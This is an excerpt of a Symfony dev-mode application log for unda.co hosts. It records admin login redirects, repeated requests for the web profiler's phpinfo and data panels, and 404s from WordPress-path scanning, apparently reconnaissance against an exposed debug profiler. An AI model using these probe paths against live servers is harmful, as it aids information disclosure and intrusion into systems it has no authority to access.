  7033. [2025-12-20 11:32:43] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  7034. [2025-12-20 11:32:43] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7035. [2025-12-20 11:32:43] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7036. [2025-12-20 11:32:43] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  7037. [2025-12-20 11:32:43] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  7038. [2025-12-20 11:32:43] security.DEBUG: Calling Authentication entry point. [] []
  7039. [2025-12-20 11:32:45] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
  7040. [2025-12-20 11:32:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7041. [2025-12-20 11:33:00] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  7042. [2025-12-20 11:33:00] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  7043. [2025-12-20 11:33:00] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7044. [2025-12-20 11:33:00] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7045. [2025-12-20 11:33:00] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  7046. [2025-12-20 11:33:00] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  7047. [2025-12-20 11:33:00] security.DEBUG: Calling Authentication entry point. [] []
  7048. [2025-12-20 11:33:02] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  7049. [2025-12-20 11:33:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7050. [2025-12-20 11:34:51] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://ec2-35-175-10-94.compute-1.amazonaws.com/","method":"GET"} []
  7051. [2025-12-20 11:34:54] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://ec2-35-175-10-94.compute-1.amazonaws.com/_profiler/phpinfo","method":"GET"} []
  7052. [2025-12-20 11:35:25] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  7053. [2025-12-20 11:37:17] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  7054. [2025-12-20 11:37:17] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  7055. [2025-12-20 11:37:19] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  7056. [2025-12-20 11:37:20] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  7057. [2025-12-20 11:37:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=swiftmailer","method":"GET"} []
  7058. [2025-12-20 11:37:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  7059. [2025-12-20 11:38:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"486bc0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/486bc0?panel=request","method":"GET"} []
  7060. [2025-12-20 11:38:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  7061. [2025-12-20 11:40:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"260090","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/260090?panel=logger","method":"GET"} []
  7062. [2025-12-20 11:40:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  7063. [2025-12-20 11:40:33] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  7064. [2025-12-20 11:40:33] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  7065. [2025-12-20 11:40:33] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7066. [2025-12-20 11:40:33] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7067. [2025-12-20 11:40:33] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  7068. [2025-12-20 11:40:33] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  7069. [2025-12-20 11:40:33] security.DEBUG: Calling Authentication entry point. [] []
  7070. [2025-12-20 11:40:35] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  7071. [2025-12-20 11:40:36] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  7072. [2025-12-20 11:40:36] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  7073. [2025-12-20 11:40:36] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7074. [2025-12-20 11:40:36] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7075. [2025-12-20 11:40:36] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  7076. [2025-12-20 11:40:36] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  7077. [2025-12-20 11:40:36] security.DEBUG: Calling Authentication entry point. [] []
  7078. [2025-12-20 11:40:38] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  7079. [2025-12-20 11:40:41] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
  7080. [2025-12-20 11:40:41] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  7081. [2025-12-20 11:40:41] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7082. [2025-12-20 11:40:41] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7083. [2025-12-20 11:40:41] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  7084. [2025-12-20 11:40:41] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  7085. [2025-12-20 11:40:41] security.DEBUG: Calling Authentication entry point. [] []
  7086. [2025-12-20 11:40:43] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
  7087. [2025-12-20 11:40:43] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  7088. [2025-12-20 11:40:43] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7089. [2025-12-20 11:40:43] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7090. [2025-12-20 11:40:43] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  7091. [2025-12-20 11:40:43] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  7092. [2025-12-20 11:40:43] security.DEBUG: Calling Authentication entry point. [] []
  7093. [2025-12-20 11:40:44] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
  7094. [2025-12-20 11:40:44] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
  7095. [2025-12-20 11:40:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7096. [2025-12-20 11:40:57] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  7097. [2025-12-20 11:40:57] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  7098. [2025-12-20 11:40:57] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7099. [2025-12-20 11:40:57] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7100. [2025-12-20 11:40:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7101. [2025-12-20 11:40:57] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  7102. [2025-12-20 11:40:57] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  7103. [2025-12-20 11:40:57] security.DEBUG: Calling Authentication entry point. [] []
  7104. [2025-12-20 11:41:00] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  7105. [2025-12-20 11:41:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7106. [2025-12-20 11:41:04] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  7107. [2025-12-20 11:41:04] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  7108. [2025-12-20 11:41:04] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7109. [2025-12-20 11:41:04] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7110. [2025-12-20 11:41:04] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  7111. [2025-12-20 11:41:04] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  7112. [2025-12-20 11:41:04] security.DEBUG: Calling Authentication entry point. [] []
  7113. [2025-12-20 11:41:06] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  7114. [2025-12-20 11:41:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7115. [2025-12-20 11:41:18] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
  7116. [2025-12-20 11:41:18] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  7117. [2025-12-20 11:41:18] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7118. [2025-12-20 11:41:18] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7119. [2025-12-20 11:41:18] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  7120. [2025-12-20 11:41:18] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  7121. [2025-12-20 11:41:18] security.DEBUG: Calling Authentication entry point. [] []
  7122. [2025-12-20 11:41:20] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
  7123. [2025-12-20 11:41:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7124. [2025-12-20 11:41:31] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  7125. [2025-12-20 11:41:31] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  7126. [2025-12-20 11:41:31] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7127. [2025-12-20 11:41:31] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  7128. [2025-12-20 11:41:31] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  7129. [2025-12-20 11:41:31] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  7130. [2025-12-20 11:41:31] security.DEBUG: Calling Authentication entry point. [] []
  7131. [2025-12-20 11:41:33] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  7132. [2025-12-20 11:41:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7133. [2025-12-20 11:42:28] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  7134. [2025-12-20 11:42:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f03987","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f03987","method":"GET"} []
  7135. [2025-12-20 11:42:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  7136. [2025-12-20 11:43:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"223e5d","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/223e5d?panel=twig","method":"GET"} []
  7137. [2025-12-20 11:43:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  7138. [2025-12-20 11:45:14] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"5ebd67","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/5ebd67/search/results?ip=66.249.75.1&limit=10","method":"GET"} []
  7139. [2025-12-20 11:45:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.75.1&limit=10","method":"GET"} []
  7140. [2025-12-20 11:45:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css/colors/blue" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css/colors/blue\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7141. [2025-12-20 11:45:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-bindings" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-bindings\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7142. [2025-12-20 11:45:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7143. [2025-12-20 11:45:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api/fields" (from "https://duckduckgo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api/fields\" (from \"https://duckduckgo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
